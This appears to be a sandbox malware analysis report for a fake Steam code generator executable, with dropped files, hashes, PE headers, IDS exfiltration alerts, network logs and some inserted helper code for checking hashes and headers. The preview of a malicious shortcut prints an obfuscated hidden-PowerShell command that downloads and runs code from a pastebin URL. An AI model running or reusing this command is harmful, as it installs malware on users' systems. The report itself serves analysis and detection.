Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
Category: dropped
Size (bytes): 1728
Entropy (8bit): 4.527272298423835
Encrypted: false
SSDEEP: 24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
MD5: 724AA21828AD912CB466E3B0A79F478B
SHA1: 41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
SHA-256: D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
SHA-512: B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
Malicious: true
                                                                                                                        Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

Process: C:\Users\user\Desktop\steamcodegenerator.exe
File Type: data
Category: dropped
Size (bytes): 39510
Entropy (8bit): 7.693386599727056
Encrypted: false
SSDEEP: 768:J8AiMUiDCHFlDY8E5X+2ewgdXC8pgpfcS7iKGztVuanh8w2OfJ:J8EUsCHFlDY3+2YBC8WJcS7i9u6ye
MD5: EBE145BD87E74B4BCA45E87525372F04
SHA1: EBE63CBA99F213980C7A94BACD580B347D740D4E
SHA-256: A53308B29B375BBE5140B8FC3781FE0E2F0F6F06A447C0F27AC9189F20B2F4B1
SHA-512: BFECFC20EAA3A62D58EDBFF2B5F69A75A382BFB58AFB3D3CB19FFEDC2A9E7AB3319BF714088B8586613419ECF4FCAC6C04CDA8AB75B0C86BF977F7164D05C463
Malicious: false
Yara Hits:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txt, Author: unknown

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious: false
                                                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulkL:NllUk
MD5: 9EF5106A0944AFC70B2A333171E1FAEE
SHA1: F091748D14B5BE64341FE4FE6C37910B7515238A
SHA-256: F0696ACA49FCD3CD4A29C22CC3D93F1E5C146572C548391615752CC63803B164
SHA-512: 67BC4DF2CC79A9E3DBDF9C0363F1C168808AFFAD2B9F5D4A053A679C42D0B7BCDF84D9DE90E67F32DF3AF92F3627D295E9C40DF52AA86014C1ACDE89036742D5
Malicious: false
                                                                                                                        Preview:@...e...............................[.k!.............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Identical entry (Process: powershell.exe, same size, hashes and preview) repeated 7 more times.
                                                                                                                        Process:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):46
                                                                                                                        Entropy (8bit):4.795088586397729
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:i9CLLWBBEACpctn:wCLUXCpctn
                                                                                                                        MD5:019EA55558F1B74BDF4831A0B951422F
                                                                                                                        SHA1:CC07CA8CBD26F22578BFA7E5325793787777E9D6
                                                                                                                        SHA-256:D4E64AC1F608C58B1650769A78B237DEA3A08401ECC86DE4B25F4B53ED185699
                                                                                                                        SHA-512:7FF442800DA2C7DFAA2D56A5D8DBE91E68B58A3441DD69D451676E43E4F936BFDDA073E5C07A048952D60E8B5938EDAF17D0DFAD38B29FC4611E51886A0480EC
                                                                                                                        Malicious:false
                                                                                                                        Preview:Generating.....Steam Code: UQNYA-GBGFP-LVE8U..
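The 60-byte text files above are the probe file PowerShell writes on startup to test whether an AppLocker/WDAC script policy is in force; they are benign and say nothing about the sample. Their reported size, entropy and hashes can be recomputed from the preview alone, which is a quick way to confirm what a sandbox is describing without re-running it. The following is an added example, not part of the Joe Sandbox report; it assumes the file content is the preview text plus one trailing space (the preview is 59 characters, the report says 60 bytes with no line terminator), and the reported entropy confirms that assumption to the last digit.

```python
"""Recompute the static fields a sandbox reports for a dropped text file."""
import hashlib
import math
from collections import Counter

# Reconstructed content of the dropped file: the report's Preview line plus a
# trailing space (assumption; the report gives 60 bytes, the preview shows 59).
PS_POLICY_TEST = b"# PowerShell test file to determine AppLocker lockdown mode "


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the same 'Entropy (8bit)' measure the report prints (0..8)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe(data: bytes) -> dict:
    """Size, entropy and the three hashes in the report's upper-case hex style."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


def matches_report(data: bytes, size: int, entropy: float, tol: float = 1e-9) -> bool:
    """True when the reconstructed content reproduces the reported size and entropy.

    Entropy is a weak fingerprint on its own (many strings share one value),
    so compare the hashes from describe() as well before trusting a reconstruction.
    """
    return len(data) == size and abs(shannon_entropy(data) - entropy) < tol


if __name__ == "__main__":
    for key, value in describe(PS_POLICY_TEST).items():
        print(f"{key}: {value}")
    # Values copied from the report: Size (bytes) 60, Entropy (8bit) 4.038920595031593
    print("matches report:", matches_report(PS_POLICY_TEST, 60, 4.038920595031593))
```

The entropy value is exact to 15 digits, so the trailing space is real; the printed MD5/SHA-1/SHA-256 can then be compared with the report's D17FE0A3... / 6AB83620... / 96AD1146... lines to settle the reconstruction completely. Dropping the trailing space changes both size and entropy, which is what the negative check in the test exercises.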
                                                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                        Entropy (8bit):6.2652516764461375
                                                                                                                        TrID:
                                                                                                                        • Win64 Executable Console (202006/5) 92.65%
                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:steamcodegenerator.exe
                                                                                                                        File size:258'048 bytes
                                                                                                                        MD5:d4f1751389516a3dfac98551142cb153
                                                                                                                        SHA1:f362178e1ecd3eac536b666e89c2aa5663109116
                                                                                                                        SHA256:eb727ad773925864801802b58b3060cfb1a0c18c1be78c8f9e6fc1d2840b19af
                                                                                                                        SHA512:d3e0e04c414c26c37894efe1cdd8adf1970ede58ffac510e17315f4599178706c5ce70d47796900e011f76444e3bb52238a542f60120a7a2a94d96c8ac3d4cab
                                                                                                                        SSDEEP:3072:IyEnMIVkwfjZrzYxopX5SfebFd+l1EkMmLmAvGaQNTxDwYPfMpOEM0UAP+Sg56:ILVDrZrzYapJQebFd+vFMmbTaThQ1UN
                                                                                                                        TLSH:DA447B5577A50CF8EC67827DCC514A0AE6B2BC160760EB9F03A08B5B5F236E09D3E761
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...j...i...l.1.i...m...i...i...i..lm...i..lj...i..ll...i...h...i...h...i..l`...i..l....i..lk...i.Rich..i........
                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                        Entrypoint:0x140009080
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x140000000
                                                                                                                        Subsystem:windows cui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x67093850 [Fri Oct 11 14:38:08 2024 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:f63ec0d9e5630f984a80952b9a46676a
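The static block above (entrypoint, image base, subsystem, characteristics, DLL characteristics, link timestamp, OS/subsystem versions) is read straight out of the COFF and PE32+ optional headers, and it is worth being able to reproduce it from the raw bytes when checking a sandbox's summary against the sample in hand. The following is an added example and not part of the Joe Sandbox report: a minimal header parser using only `struct`, exercised on a synthetic PE32+ header constructed inline with this sample's reported values (the sample itself is not embedded; the section table and data directories are left empty, which is an assumption of the synthetic input, not of the parser).

```python
"""Parse the COFF/PE32+ header fields a sandbox's static summary prints."""
import struct
from datetime import datetime, timezone

# Flag names as used in the report (subset of IMAGE_FILE_* / IMAGE_DLLCHARACTERISTICS_*).
IMAGE_FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
IMAGE_DLLCHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}


def flags(value: int, table: dict) -> list:
    """Decode a bit field into the report's flag names, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data: bytes) -> dict:
    """Return the header fields shown in the report's static 'File type' block."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    machine, _nsect, ts, _, _, _opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic != 0x20B:
        raise ValueError("only PE32+ (magic 0x20b) is handled here")
    # IMAGE_OPTIONAL_HEADER64 offsets: 16 AddressOfEntryPoint, 24 ImageBase,
    # 40 Major/MinorOperatingSystemVersion, 68 Subsystem, 70 DllCharacteristics.
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "machine": hex(machine),
        "entrypoint": hex(image_base + entry_rva),
        "image_base": hex(image_base),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "characteristics": flags(chars, IMAGE_FILE_CHARACTERISTICS),
        "dll_characteristics": flags(dll_chars, IMAGE_DLLCHARACTERISTICS),
        "timestamp_raw": hex(ts),
        "timestamp": datetime.fromtimestamp(ts, timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC"),
        "os_version": f"{os_major}.{os_minor}",
    }


def build_header(ts, entry_rva, image_base, subsystem, chars, dll_chars) -> bytes:
    """Constructed test input: a bare DOS stub + PE32+ headers, no sections."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 1, ts, 0, 0, 240, chars)
    opt = bytearray(240)  # PE32+ optional header incl. 16 empty data directories
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<Q", opt, 24, image_base)
    struct.pack_into("<6H", opt, 40, 6, 0, 6, 0, 6, 0)  # OS / image / subsystem 6.0
    struct.pack_into("<HH", opt, 68, subsystem, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Synthetic header carrying the values the report lists for this sample.
SAMPLE_HEADER = build_header(
    ts=0x67093850, entry_rva=0x9080, image_base=0x140000000, subsystem=3,
    chars=0x0002 | 0x0020, dll_chars=0x0020 | 0x0040 | 0x0100 | 0x8000,
)

if __name__ == "__main__":
    for key, value in parse_pe(SAMPLE_HEADER).items():
        print(f"{key}: {value}")
```

Two caveats when reading these fields on a real sample: the TimeDateStamp is a plain 32-bit value the author controls, so it is evidence of build time only when nothing else contradicts it, and `DYNAMIC_BASE`/`HIGH_ENTROPY_VA`/`NX_COMPAT` being set says the image tolerates ASLR and DEP, not that the loader will apply them on every host.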
                                                                                                                        Instruction (listing at entrypoint 0x140009080; the decoder here treats the x64 code as 32-bit, so each `dec eax` is really the REX.W prefix byte 0x48 of the instruction after it: `dec eax` + `sub esp, 28h` is `sub rsp, 28h`, and the sub/call/add/jmp sequence is consistent with the standard MSVC CRT startup stub rather than attacker-written code)
                                                                                                                        dec eax
                                                                                                                        sub esp, 28h
                                                                                                                        call 00007F2EDCE7997Ch
                                                                                                                        dec eax
                                                                                                                        add esp, 28h
                                                                                                                        jmp 00007F2EDCE78FF7h
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        dec eax
                                                                                                                        sub esp, 28h
                                                                                                                        call 00007F2EDCE79CFCh
                                                                                                                        test eax, eax
                                                                                                                        je 00007F2EDCE791A3h
                                                                                                                        dec eax
                                                                                                                        mov eax, dword ptr [00000030h]
                                                                                                                        dec eax
                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                        jmp 00007F2EDCE79187h
                                                                                                                        dec eax
                                                                                                                        cmp ecx, eax
                                                                                                                        je 00007F2EDCE79196h
                                                                                                                        xor eax, eax
                                                                                                                        dec eax
                                                                                                                        cmpxchg dword ptr [00034698h], ecx
                                                                                                                        jne 00007F2EDCE79170h
                                                                                                                        xor al, al
                                                                                                                        dec eax
                                                                                                                        add esp, 28h
                                                                                                                        ret
                                                                                                                        mov al, 01h
                                                                                                                        jmp 00007F2EDCE79179h
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a934 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x43000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3f000 | 0x2460 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x44000 | 0x9a4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x36460 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x36320 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x2e8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f40 | 0x2a000 | 2ad535e4366959067e2e60d8aafa7658 | False | 0.5462646484375 | data | 6.492900443589932 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x102ee | 0x10400 | f45884d9dba838b4f775fb0b6ef92b79 | False | 0.42321213942307695 | data | 4.8807783288878275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3c000 | 0x2a50 | 0x1400 | 3c0e81b51e51780698ebe5ffc0a838de | False | 0.162890625 | DOS executable (block device driver) | 2.705660946828352 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x3f000 | 0x2460 | 0x2600 | 641900e4b17ed72e996a7af8fcf39302 | False | 0.46895559210526316 | data | 5.255275322700397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x42000 | 0x1f4 | 0x200 | 093bc688e5029835ff2195256ddf5afd | False | 0.494140625 | data | 3.6328021103092234 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x43000 | 0x1e0 | 0x200 | 9866eeb93e80b773405f3d7936b83641 | False | 0.52734375 | data | 4.7074344725994175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x44000 | 0x9a4 | 0xa00 | 6e22f657667f6504de5a7699c3e54392 | False | 0.496875 | data | 5.389301065625464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x43060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | VirtualFree, VirtualAlloc, MultiByteToWideChar, Sleep, GetLastError, WriteConsoleW, CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, RtlUnwind
WININET.dll | InternetOpenW, InternetOpenUrlW, InternetCloseHandle, InternetReadFile
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-15T15:52:55.501300+0200 | 2857658 | ETPRO MALWARE Win32/Fake Robux Bot Registration | 1 | 192.168.2.6 | 49898 | 162.159.138.232 | 443 | TCP
2024-10-15T15:53:10.691283+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 49983 | 162.159.138.232 | 443 | TCP
2024-10-15T15:53:18.245903+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 49997 | 162.159.138.232 | 443 | TCP
                                                                                                                        Oct 15, 2024 15:52:36.182456970 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.182529926 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.190910101 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.190926075 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.191257000 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.201561928 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.247411013 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437628984 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437793970 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437832117 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437860966 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437890053 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.437913895 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437928915 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.438405037 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.438477993 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.438525915 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.759629965 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:54.322736979 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.327624083 CEST8049894172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.327692032 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.331157923 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.336011887 CEST8049894172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.516369104 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:54.516422033 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.517225981 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:54.518043995 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:54.518071890 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.937272072 CEST8049894172.67.19.24192.168.2.6
